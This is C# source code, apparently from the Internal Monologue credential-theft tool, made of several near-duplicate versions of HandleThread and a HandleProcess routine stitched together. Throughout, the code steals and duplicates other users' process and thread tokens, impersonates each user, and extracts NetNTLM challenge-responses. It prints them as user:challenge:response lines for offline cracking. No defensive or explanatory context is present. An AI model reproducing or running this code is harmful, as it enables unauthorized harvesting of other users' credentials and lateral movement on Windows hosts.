public string HandleThread(ProcessThread thread, string challenge, bool verbose)
{
var output = "";
try
{
var token = IntPtr.Zero;
string SID = null;
//Try to get thread handle
var handle = OpenThread(0x0040, true, new IntPtr(thread.Id));
//If failed, return
if (handle == IntPtr.Zero)
{
return(output);
}
if (OpenThreadToken(handle, 0x0008, true, ref token))
{
//Get the SID of the token
SID = GetLogonId(token);
CloseHandle(token);
if (!ValidateSID(SID, verbose))
{
return(output);
}
if (OpenThreadToken(handle, 0x0002, true, ref token))
{
var sa = new SECURITY_ATTRIBUTES();
sa.nLength = Marshal.SizeOf(sa);
var dupToken = IntPtr.Zero;
DuplicateTokenEx(
token,
0x0002 | 0x0008,
ref sa,
(int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
(int)1,
ref dupToken);
CloseHandle(token);
try
{
using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken))
{
if (verbose == true)
{
output += string.Format("Impersonated user {0}\n", WindowsIdentity.GetCurrent().Name);
}
string result = InternalMonologueForCurrentUser(challenge);
//Ensure it is a valid response and not blank
if (!string.IsNullOrWhiteSpace(result))
{
output += result + "\n";
authenticatedUsers.Add(SID);
}
else if (verbose == true)
{
output += string.Format("Got blank response for user {0}\n", WindowsIdentity.GetCurrent().Name);
}
}
}
catch
{ /*Does not need to do anything if it fails*/ }
finally
{
CloseHandle(dupToken);
}
}
}
}
catch (Exception)
{ /*Does not need to do anything if it fails*/ }
return(output);
}
public static void HandleThread(ProcessThread thread, string challenge, bool verbose)
{
string SID = null;
try
{
//Try to get thread handle
var handle = OpenThread(0x0040, true, new IntPtr(thread.Id));
//If failed, return
if (handle == IntPtr.Zero)
{
return;
}
//Duplicate thread token
var token = IntPtr.Zero;
var dupToken = IntPtr.Zero;
if (OpenThreadToken(handle, 0x0002, true, ref token))
{
var sa = new SECURITY_ATTRIBUTES();
sa.nLength = Marshal.SizeOf(sa);
DuplicateTokenEx(
token,
0x0002 | 0x0008,
ref sa,
(int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
(int)1,
ref dupToken);
CloseHandle(token);
try
{
//Get the SID of the token
StringBuilder sb = new StringBuilder();
int TokenInfLength = 1024;
IntPtr TokenInformation = Marshal.AllocHGlobal(TokenInfLength);
Boolean Result = GetTokenInformation(dupToken, 1, TokenInformation, TokenInfLength, out TokenInfLength);
if (Result)
{
TOKEN_USER TokenUser = (TOKEN_USER)Marshal.PtrToStructure(TokenInformation, typeof(TOKEN_USER));
IntPtr pstr = IntPtr.Zero;
Boolean ok = ConvertSidToStringSid(TokenUser.User.Sid, out pstr);
SID = Marshal.PtrToStringAuto(pstr);
LocalFree(pstr);
}
Marshal.FreeHGlobal(TokenInformation);
}
catch (Exception e)
{
CloseHandle(dupToken);
CloseHandle(handle);
}
}
//Handle each available user only once
if (SID != null && authenticatedUsers.Contains(SID) == false)
{
try
{
//Impersonate user
using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken))
{
if (verbose == true)
{
Console.WriteLine("Impersonated user " + WindowsIdentity.GetCurrent().Name);
}
string result = ByteArrayToString(InternalMonologueForCurrentUser(challenge));
//Ensure there is a valid response and not a blank
if (result != null && result.Length > 0)
{
Console.WriteLine(WindowsIdentity.GetCurrent().Name + ":" + challenge + ":" + result);
authenticatedUsers.Add(SID);
}
else if (verbose == true)
{
Console.WriteLine("Got blank response for user " + WindowsIdentity.GetCurrent().Name);
}
}
}
catch (Exception e)
{ /*Does not need to do anything if it fails*/ }
finally
{
CloseHandle(dupToken);
CloseHandle(handle);
}
}
}
catch (Exception)
{ /*Does not need to do anything if it fails*/ }
}
public static void HandleThread(ProcessThread thread, string challenge, bool verbose)
{
try
{
var token = IntPtr.Zero;
var dupToken = IntPtr.Zero;
string SID = null;
//Try to get thread handle
var handle = OpenThread(0x0040, true, new IntPtr(thread.Id));
//If failed, return
if (handle == IntPtr.Zero)
{
return;
}
if (OpenThreadToken(handle, 0x0008, true, ref token))
{
//Get the SID of the token
SID = GetLogonId(token);
CloseHandle(token);
//Check if this user hasn't been handled yet
if (SID != null && authenticatedUsers.Contains(SID) == false)
{
if (OpenThreadToken(handle, 0x0002, true, ref token))
{
var sa = new SECURITY_ATTRIBUTES();
sa.nLength = Marshal.SizeOf(sa);
DuplicateTokenEx(
token,
0x0002 | 0x0008,
ref sa,
(int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
(int)1,
ref dupToken);
CloseHandle(token);
try
{
using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken))
{
if (verbose == true)
{
Console.WriteLine("Impersonated user " + WindowsIdentity.GetCurrent().Name);
}
string result = InternalMonologueForCurrentUser(challenge);
//Ensure it is a valid response and not blank
if (result != null && result.Length > 0)
{
Console.WriteLine(result);
authenticatedUsers.Add(SID);
}
else if (verbose == true)
{
Console.WriteLine("Got blank response for user " + WindowsIdentity.GetCurrent().Name);
}
}
}
catch (Exception e)
{ /*Does not need to do anything if it fails*/ }
finally
{
CloseHandle(dupToken);
}
}
}
}
}
catch (Exception)
{ /*Does not need to do anything if it fails*/ }
}
public InternalMonologueConsole HandleProcess(Process process, string challenge, bool verbose)
{
var console = new InternalMonologueConsole();
try
{
var token = IntPtr.Zero;
var dupToken = IntPtr.Zero;
string SID = null;
if (OpenProcessToken(process.Handle, 0x0008, ref token))
{
//Get the SID of the token
SID = GetLogonId(token);
CloseHandle(token);
if (!ValidateSID(SID, verbose))
{
return(null);
}
if (verbose)
{
console.AddConsole(string.Format("{0} {1}\n", SID, process.ProcessName));
}
if (OpenProcessToken(process.Handle, 0x0002, ref token))
{
var sa = new SECURITY_ATTRIBUTES();
sa.nLength = Marshal.SizeOf(sa);
DuplicateTokenEx(
token,
0x0002 | 0x0008,
ref sa,
(int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
(int)1,
ref dupToken);
CloseHandle(token);
try
{
using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken))
{
if (verbose == true)
{
console.AddConsole(string.Format("Impersonated user {0}\n", WindowsIdentity.GetCurrent().Name));
}
var result = InternalMonologueForCurrentUser(challenge, true);
//Ensure it is a valid response and not blank
if (!result.Resp1.IsNullOrWhiteSpace())
{
console.AddResponse(result);
console.AddConsole(string.Format("{0}\n", result.ToString()));
authenticatedUsers.Add(SID);
}
else if (verbose == true)
{
console.AddConsole(string.Format("Got blank response for user {0}\n", WindowsIdentity.GetCurrent().Name));
}
}
}
catch
{ /*Does not need to do anything if it fails*/ }
finally
{
CloseHandle(dupToken);
}
}
}
}
catch (Exception)
{ /*Does not need to do anything if it fails*/ }
return(console);
}
